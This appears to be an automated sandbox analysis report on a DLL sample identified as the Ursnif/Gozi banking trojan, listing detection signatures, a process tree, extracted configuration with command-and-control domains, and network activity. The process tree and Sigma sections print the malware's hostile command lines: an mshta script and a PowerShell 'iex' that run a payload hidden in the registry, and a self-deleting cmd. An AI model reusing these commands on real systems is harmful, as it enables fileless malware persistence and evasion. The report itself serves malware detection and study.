Loading ...

Play interactive tourEdit tour

Windows Analysis Report uT9rwkGATJ.dll

Overview

General Information

Sample Name:uT9rwkGATJ.dll
Analysis ID:499264
MD5:9a453cc31ebfca29d8df565258fbf8ce
SHA1:5eb3be88abb84f63e04c92bc3e35a82a01689971
SHA256:eaed947e04ed7659fbba2287e6965b2c0960035aa539b57a9f9e15504a01ca0a
Tags:dllGoziISFBUrsnif
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: Powershell run code from registry
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Sigma detected: Encoded IEX
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Writes or reads registry keys via WMI
Suspicious powershell command line found
Machine Learning detection for sample
Allocates memory in foreign processes
Uses ping.exe to check the status of other devices and networks
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
Sigma detected: MSHTA Spawning Windows Shell
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Sigma detected: Suspicious Csc.exe Source File Folder
Disables SPDY (HTTP compression, likely to perform web injects)
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Modifies the import address table of user mode modules (user mode IAT hooks)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Sigma detected: Suspicious Rundll32 Activity
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6424 cmdline: loaddll32.exe 'C:\Users\user\Desktop\uT9rwkGATJ.dll' MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 6392 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\uT9rwkGATJ.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6388 cmdline: rundll32.exe 'C:\Users\user\Desktop\uT9rwkGATJ.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 3548 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
          • rundll32.exe (PID: 6040 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 6400 cmdline: rundll32.exe C:\Users\user\Desktop\uT9rwkGATJ.dll,Camptiny MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5980 cmdline: rundll32.exe C:\Users\user\Desktop\uT9rwkGATJ.dll,Consonantget MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5868 cmdline: rundll32.exe C:\Users\user\Desktop\uT9rwkGATJ.dll,LongSubstance MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • control.exe (PID: 4000 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
      • rundll32.exe (PID: 6504 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
  • mshta.exe (PID: 6856 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Mcbw='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mcbw).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 6972 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 1304 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uio4qdnj.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 3932 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9EC1.tmp' 'c:\Users\user\AppData\Local\Temp\CSC494F2C58C9734FA38D9A23FE2A87D91.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 5452 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\hjljqxud.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 3912 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB287.tmp' 'c:\Users\user\AppData\Local\Temp\CSCFBA5379BA96A41E2BDA53EBC60FE73A9.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 4452 cmdline: 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\uT9rwkGATJ.dll' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 4584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • PING.EXE (PID: 6088 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
        • cmd.exe (PID: 1460 cmdline: 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\uT9rwkGATJ.dll' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 6536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • PING.EXE (PID: 6372 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
        • RuntimeBroker.exe (PID: 4084 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
  • mshta.exe (PID: 5772 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Edc0='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Edc0).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 5480 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 344 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\hiiw3gsl.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 3380 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB12F.tmp' 'c:\Users\user\AppData\Local\Temp\CSCB0814D4E7B5456EB73AE824564C98E9.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 5640 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ebytp2em.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 4880 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESC95B.tmp' 'c:\Users\user\AppData\Local\Temp\CSCB67CC2333FCC4BD79D679F53D429B77D.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "Wa0ptOHdbeWyaLju6Av14Mh7FDVECzYw3M++OWU/cFwf0ZjLctG17DYP/MFVk/hMExgeVHSsuIoKkcbpz57JUku89Z6sGfWSZvCVyvpfi1ZpEwDNNeNw5k5dpgwB3LsIS45sMaK472UpYahrOWaY66CWVjJyKzpo2y/tq1ZiFHe/iFygPyws634yVgV7rQhjAPiNPuq0SMLwHnadf5iTBRPHNZOfo4EV1JOy+KK7FD2JiBwbgL2xH8mvgvUrMN0gphdmog43p4QO6+T4499NqSdjKKJutU5bxT8XtJKvzMrbRLkRwTKw+5msPiKoZk2Mmt6I5yjyUlMUijuRPmFH+uUAMGA+NmgwHR/EoB9vyak=", "c2_domain": ["outlook.com", "zereunrtol.website", "xereunrtol.website"], "botnet": "2525", "server": "12", "serpent_key": "10218409ILPAQDIR", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000003.534061111.00000000018D8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000000.00000003.678884329.0000000004348000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000000.00000003.534116872.00000000018D8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000000.00000003.533922988.00000000018D8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000004.00000003.475507356.0000000000960000.00000040.00000001.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
            Click to see the 29 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.loaddll32.exe.b00000.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
              4.3.rundll32.exe.4a794a0.1.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                4.3.rundll32.exe.96a309.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                  0.2.loaddll32.exe.13494a0.1.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                    4.3.rundll32.exe.4a794a0.1.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                      Click to see the 15 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Encoded IEXShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Mcbw='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mcbw).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6856, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), ProcessId: 6972
                      Sigma detected: MSHTA Spawning Windows ShellShow sources
                      Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Mcbw='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mcbw).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6856, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), ProcessId: 6972
                      Sigma detected: Mshta Spawning Windows ShellShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Mcbw='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mcbw).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6856, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), ProcessId: 6972
                      Sigma detected: Suspicious Csc.exe Source File FolderShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uio4qdnj.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uio4qdnj.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6972, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uio4qdnj.cmdline', ProcessId: 1304
                      Sigma detected: Suspicious Rundll32 ActivityShow sources
                      Source: Process startedAuthor: juju4, Jonhnathan Ribeiro, oscd.community: Data: Command: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 4000, ProcessCommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, ProcessId: 6504
                      Sigma detected: Non Interactive PowerShellShow sources
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Mcbw='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mcbw).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6856, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), ProcessId: 6972
                      Sigma detected: T1086 PowerShell ExecutionShow sources
                      Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132781743762523748.6972.DefaultAppDomain.powershell

                      Data Obfuscation:

                      barindex
                      Sigma detected: Powershell run code from registryShow sources
                      Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Mcbw='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mcbw).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6856, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), ProcessId: 6972

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 00000004.00000003.475507356.0000000000960000.00000040.00000001.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "Wa0ptOHdbeWyaLju6Av14Mh7FDVECzYw3M++OWU/cFwf0ZjLctG17DYP/MFVk/hMExgeVHSsuIoKkcbpz57JUku89Z6sGfWSZvCVyvpfi1ZpEwDNNeNw5k5dpgwB3LsIS45sMaK472UpYahrOWaY66CWVjJyKzpo2y/tq1ZiFHe/iFygPyws634yVgV7rQhjAPiNPuq0SMLwHnadf5iTBRPHNZOfo4EV1JOy+KK7FD2JiBwbgL2xH8mvgvUrMN0gphdmog43p4QO6+T4499NqSdjKKJutU5bxT8XtJKvzMrbRLkRwTKw+5msPiKoZk2Mmt6I5yjyUlMUijuRPmFH+uUAMGA+NmgwHR/EoB9vyak=", "c2_domain": ["outlook.com", "zereunrtol.website", "xereunrtol.website"], "botnet": "2525", "server": "12", "serpent_key": "10218409ILPAQDIR", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}
                      Machine Learning detection for sampleShow sources
                      Source: uT9rwkGATJ.dllJoe Sandbox ML: detected
                      Source: uT9rwkGATJ.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: unknownHTTPS traffic detected: 40.97.156.114:443 -> 192.168.2.3:49754 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.98.208.114:443 -> 192.168.2.3:49755 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.97.151.18:443 -> 192.168.2.3:49756 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.97.160.2:443 -> 192.168.2.3:49764 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.101.9.178:443 -> 192.168.2.3:49765 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.97.178.98:443 -> 192.168.2.3:49766 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.29.104.83:443 -> 192.168.2.3:49828 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.29.104.83:443 -> 192.168.2.3:49829 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.29.104.83:443 -> 192.168.2.3:49830 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.29.104.83:443 -> 192.168.2.3:49831 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.29.104.83:443 -> 192.168.2.3:49832 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.29.104.83:443 -> 192.168.2.3:49833 version: TLS 1.2
                      Source: uT9rwkGATJ.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: c:\Toward\clock-sit\Only_Girl\Teach.pdb source: loaddll32.exe, 00000000.00000002.823565020.000000006E1D2000.00000002.00020000.sdmp
                      Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.685807008.0000000004360000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.699239649.0000000006460000.00000004.00000001.sdmp
                      Source: Binary string: d.pdbp source: powershell.exe, 00000017.00000003.756929105.0000026CBE732000.00000004.00000001.sdmp
                      Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.685807008.0000000004360000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.699239649.0000000006460000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\uio4qdnj.pdb~U source: powershell.exe, 00000017.00000003.756929105.0000026CBE732000.00000004.00000001.sdmp
                      Source: Binary string: .C:\Users\user\AppData\Local\Temp\hiiw3gsl.pdb source: powershell.exe, 0000001B.00000002.812366311.0000029704754000.00000004.00000001.sdmp
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00B6B4A5 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,0_2_00B6B4A5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00B66467 lstrcmp,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,0_2_00B66467
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00B5BAF2 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,0_2_00B5BAF2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0334BAF2 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,3_2_0334BAF2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_03356467 lstrcmp,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,3_2_03356467
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0335B4A5 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,3_2_0335B4A5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00B52E19 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,0_2_00B52E19

                      Networking:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 52.97.178.98 187Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 193.29.104.83 187Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 40.101.9.178 187Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: outlook.office365.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: www.outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 40.97.160.2 187Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: xereunrtol.website
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: zereunrtol.website
                      Uses ping.exe to check the status of other devices and networksShow sources
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
